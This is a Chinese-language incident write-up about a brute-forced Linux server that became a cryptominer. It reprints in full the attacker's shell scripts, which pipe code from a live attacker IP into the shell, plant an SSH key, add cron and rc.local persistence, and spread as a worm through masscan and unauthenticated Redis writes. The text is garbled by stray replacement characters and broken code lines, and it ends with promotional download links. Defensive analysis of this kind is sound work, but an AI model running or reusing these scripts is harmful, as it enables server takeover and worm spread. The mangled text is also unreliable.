記一次Linux被入侵��,服務器變“礦機”全過程
周一早上剛到辦公室���,就聽到同事說有一臺服務器登陸不上了�����,我也沒放在心上���,繼續邊吃早點�,邊看幣價是不是又跌了��。
不一會運維的同事也到了����,氣喘吁吁的說:我們有臺服務器被阿里云凍結了�,理由:對外惡意發包����。
SSH 連了一下�,被拒絕了��,問了下默認的 22 端口被封了��。
讓運維的同事把端口改了一下����,立馬連上去�,順便看了一下登錄名 :root��,還有不足 8 位的小白密碼����,心里一涼:被黑了�!
服務器系統 CentOS 6.X�,部署了 Nginx���,Tomcat�����,Redis 等應用��,上來先把數據庫全備份到本地���,然后 Top 命令看了一下����,有 2 個 99% 的同名進程還在運行�����,叫 gpg-agentd�。
Google 了一下 GPG�����,結果是:
GPG 提供的 gpg-agent 提供了對 SSH 協議的支持���,這個功能可以大大簡化密鑰的管理工作�����。
看起來像是一個很正經的程序嘛����,但仔細再看看服務器上的進程后面還跟著一個字母 d����,偽裝的很好���,讓人想起來 Windows 上各種看起來像 svchost.exe 的病毒�����。
繼續排查:
ps eho
command
-p 23374netstat -pan | grep 23374
查看 pid:23374 進程啟動路徑和網絡狀況�����,也就是來到了圖 1 的目錄�����,到此已經找到了黑客留下的二進制可執行文件�����。
接下來還有 2 個問題在等著我:
-
文件是怎么上傳的��?
-
這個文件的目的是什么�,或是黑客想干嘛����?
History 看一下�,記錄果然都被清掉了�,沒留下任何痕跡�。繼續命令 more messages:
看到了在半夜 12 點左右�����,在服務器上裝了很多軟件�����,其中有幾個軟件引起了我的注意���,下面詳細講����。
邊找邊猜��,如果我們要做壞事���,大概會在哪里做文章����,自動啟動�����?定時啟動��?對�,計劃任務:
果然��,線索找到了���。
上面的計劃任務的意思就是每 15 分鐘去服務器上下載一個腳本��,并且執行這個腳本�。
我們把腳本下載下來看一下:
curl
-fsSL
159.89.190.243
/ash.php > ash.sh
腳本內容如下
:
uname -a
id
hostname
setenforce
2
>/dev/
null
ulimit -n
50000
ulimit -u
50000
crontab -r
2
>/dev/
null
rm -rf
/var/spool/cron/
*
2
>/dev/
null
mkdir -p /var/spool/cron/crontabs
2
>/dev/
null
mkdir -p
/root/
.ssh
2
>/dev/
null
echo
'ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh4inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx
redisX'
>
/root/
.ssh/authorized_keys
echo
'*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh'
> /var/spool/cron/root
echo
'*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh'
> /var/spool/cron/crontabs/root
yum install -y bash
2
>/dev/
null
apt install -y bash
2
>/dev/
null
apt-get install -y bash
2
>/dev/
null
bash -c
'curl -fsSL 159.89.190.243/bsh.php|bash'
2
>/dev/
null
大致分析一下該腳本的主要用途:
首先是關閉 SELinux����,解除 Shell 資源訪問限制��,然后在 /root/.ssh/authorized_keys 文件中生成 SSH 公鑰����。
這樣每次黑客登錄這臺服務器就可以免密碼登錄了����,執行腳本就會方便很多����。
接下來安裝 Bash�,最后是繼續下載第二個腳本 bsh.php�,并且執行����。
繼續下載并分析 bsh.pbp����,內容如下:
sleep $( seq 3 7 | sort -R | head -n1 )
cd
/tmp ||
cd
/var/tmp
sleep 1
mkdir -p .ICE-unix/... && chmod -R 777 .ICE-unix &&
cd
.ICE-unix/...
sleep 1
if
[ -f .watch ];
then
rm -rf .watch
exit
0
fi
sleep 1
echo
1 > .watch
sleep 1
ps x | awk
'!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}'
| xargs
kill
-9 2>/dev/null
ps x | awk
'!/awk/ && /barad_agent|masscan|.sr0|clay|udevs|.sshd|xig/ {print $1}'
| xargs
kill
-9 2>/dev/null
sleep 1
if
! [ -x /usr/bin/gpg-agentd ];
then
curl -s -o /usr/bin/gpg-agentd 159.89.190.243/dump.db
echo
'/usr/bin/gpg-agentd'
> /etc/rc.local
echo
'curl -fsSL 159.89.190.243/ash.php|sh'
>> /etc/rc.local
echo
'exit 0'
>> /etc/rc.local
fi
sleep 1
chmod +x /usr/bin/gpg-agentd && /usr/bin/gpg-agentd || rm -rf /usr/bin/gpg-agentd
sleep 1
if
! [ -x
"
$(command -v masscan)
"
];
then
rm -rf /var/lib/apt/lists/*
rm -rf x1.tar.gz
if
[ -x
"
$(command -v apt-get)
"
];
then
export
DEBIAN_FRONTEND=noninteractive
apt-get update -y
apt-get install -y debconf-doc
apt-get install -y build-essential
apt-get install -y libpcap0.8-dev libpcap0.8
apt-get install -y libpcap*
apt-get install -y make gcc git
apt-get install -y redis-server
apt-get install -y redis-tools
apt-get install -y redis
apt-get install -y iptables
apt-get install -y wget curl
fi
if
[ -x
"
$(command -v yum)
"
];
then
yum update -y
yum install -y epel-release
yum update -y
yum install -y git iptables make gcc redis libpcap libpcap-devel
yum install -y wget curl
fi
sleep 1
curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz
sleep 1
[ -f x1.tar.gz ] && tar zxf x1.tar.gz &&
cd
masscan-1.0.4 && make && make install &&
cd
.. && rm -rf masscan-1.0.4
fi
sleep 3 && rm -rf .watch
bash -c
'curl -fsSL 159.89.190.243/rsh.php|bash'
2>/dev/null
這段腳本的代碼比較長���,但主要的功能有 4 個:
-
下載遠程代碼到本地���,添加執行權限�����,chmod u+x�����。
-
修改 rc.local�����,讓本地代碼開機自動執行�����。
-
下載 Github 上的開源掃描器代碼���,并安裝相關的依賴軟件����,也就是我上面的 Messages 里看到的記錄��。
-
下載第三個腳本����,并且執行����。
我去 Github 上看了下這個開源代碼:
Transmitting 10 Million Packets Per Second(每秒發送 1000 萬個數據包)����,比 nmap 速度還要快�,這就不難理解為什么阿里云把服務器凍結了��。
大概看了下 Readme 之后�,我也沒有細究�,繼續下載第三個腳本:
setenforce
2
>
/dev/null
ulimit -n
50000
ulimit -u
50000
sleep
1
iptables -I INPUT
1
-p tcp --dport
6379
-j DROP
2
>
/dev/null
iptables -I INPUT
1
-p tcp --dport
6379
-s
127.0
.
.
1
-j ACCEPT
2
>
/dev/null
sleep
1
rm -rf .dat .shard .ranges .lan
2
>
/dev/null
sleep
1
echo
'config set dbfilename "backup.db"'
> .dat
echo
'save'
>>
.dat
echo
'flushall'
>>
.dat
echo
'set backup1 "
*/2 * * * * curl -fsSL http://159.89.190.243/ash.php | sh
"'
>>
.dat
echo
'set backup2 "
*/3 * * * * wget -q -O- http://159.89.190.243/ash.php | sh
"'
>>
.dat
echo
'set backup3 "
*/4 * * * * curl -fsSL http://159.89.190.243/ash.php | sh
"'
>>
.dat
echo
'set backup4 "
*/5 * * * * wget -q -O- http://159.89.190.243/ash.php | sh
"'
>>
.dat
echo
'config set dir "/var/spool/cron/"'
>>
.dat
echo
'config set dbfilename "root"'
>>
.dat
echo
'save'
>>
.dat
echo
'config set dir "/var/spool/cron/crontabs"'
>>
.dat
echo
'save'
>>
.dat
sleep
1
masscan --max-rate
10000
-p6379,
6380
--shard $( seq
1
22000
| sort -R |
head -n1 )/
22000
--exclude
255.255
.
255.255
.
.
.
/
2
>
/dev/null
| awk '{print $6, substr($4, 1, length($4)-4)}' |
sort
| uniq > .shard
sleep 1
while
read -r h p;
do
cat .dat |
redis-cli -h $h -p $p --raw
2
>
/dev/null
1
>
/dev/null
&
done < .shard
sleep
1
masscan --max-rate
10000
-p6379,
6380
192.168
.
.
/
16
172.16
.
.
/
16
116.62
.
.
/
16
116.232
.
.
/
16
116.128
.
.
/
16
116.163
.
.
/
16
2
>
/dev/null
| awk '{print $6, substr($4, 1, length($4)-4)}' |
sort
| uniq > .ranges
sleep 1
while
read -r h p;
do
cat .dat |
redis-cli -h $h -p $p --raw
2
>
/dev/null
1
>
/dev/null
&
done < .ranges
sleep
1
ip a
| grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null |
sed
's//([0-9]{2})//16/g'
> .inet
sleep
1
masscan --max-rate
10000
-p6379,
6380
-iL .inet
| awk '{print $6, substr($4, 1, length($4)-4)}' |
sort
| uniq > .lan
sleep 1
while
read -r h p;
do
cat .dat |
redis-cli -h $h -p $p --raw
2
>
/dev/null
1
>
/dev/null
&
done < .lan
sleep
60
rm -rf .dat .shard .ranges .lan
2
>
/dev/null
如果說前兩個腳本只是在服務器上下載執行了二進制文件���,那這個腳本才真正顯示病毒的威力��。下面就來分析這個腳本�。
一開始的修改系統環境沒什么好說的��,接下來的寫文件操作有點眼熟�����,如果用過 Redis 的人����,應該能猜到����,這里是對 Redis 進行配置�。
寫這個配置��,自然也就是利用了 Redis 把緩存內容寫入本地文件的漏洞�,結果就是用本地的私鑰去登陸被寫入公鑰的服務器了�����,無需密碼就可以登陸���,也就是我們文章最開始的 /root/.ssh/authorized_keys�����。
登錄之后就開始定期執行計劃任務�,下載腳本����。好了��,配置文件準備好了���,就開始利用 Masscan 進行全網掃描 Redis 服務器�����,尋找肉雞�。
注意看這 6379 就是 Redis 服務器的默認端口�����,如果你的 Redis 的監聽端口是公網 IP 或是 0.0.0.0�,并且沒有密碼保護���,不好意思��,你就中招了���。
通過依次分析這 3 個腳本�,就能看出這個病毒的可怕之處����,先是通過寫入 ssh public key 拿到登錄權限�����,然后下載執行遠程二進制文件���,最后再通過 Redis 漏洞復制���,迅速在全網傳播�����,以指數級速度增長�����。
那么問題是����,這臺服務器是怎么中招的呢�?看了下 redis.conf��,Bind 的地址是 127.0.0.1�,沒啥問題���。
由此可以推斷�,應該是 Root 帳號被暴力破解了�����,為了驗證我的想法��,我 Lastb 看了一下��,果然有大量的記錄:
還剩最后一個問題�����,這個 gpg-agentd 程序到底是干什么的呢���?我當時的第一個反應就是礦機�,因為現在數字貨幣太火了�,加大了分布式礦機的需求���,也就催生了這條灰色產業鏈�。
于是���,順手把這個 gpg-agentd 拖到 Ida 中����,用 String 搜索 bitcoin��,eth��,mine 等相關單詞�,最終發現了這個:
打開 nicehash.com 看一下�����,一切都清晰了:
服務器:
-
禁用 ROOT
-
用戶名和密碼盡量復雜
-
修改 SSH 的默認 22 端口
-
安裝 DenyHosts 防暴力破解軟件
-
禁用密碼登錄�,使用 RSA 公鑰登錄
Redis:
-
禁用公網 IP 監聽�,包括 0.0.0.0
-
使用密碼限制訪問 Redis
-
使用較低權限帳號運行 Redis
到此��,整個入侵過程基本分析完了�,如果大家對樣本有興趣��,也可以自行去 Curl�����,或是去虛擬機執行上面的腳本����。鑒于本人能力有限�����,文中難免會出現疏忽或是錯誤����,還請大家多多指正�。
文章源于:看雪論壇 Hefe
今日福利:
2019版Linux云計算+運維開發路線圖
刪庫也不怕
!2
小時教你玩轉企業級數據庫備份與還原
https://pan.baidu.com/s/16DMOuvwOwD8biekriLao5Q
鏈接:
https://pan.baidu.com/s/1kFiMox_vrUR3xyasvkJFlA
提取碼:
ha99
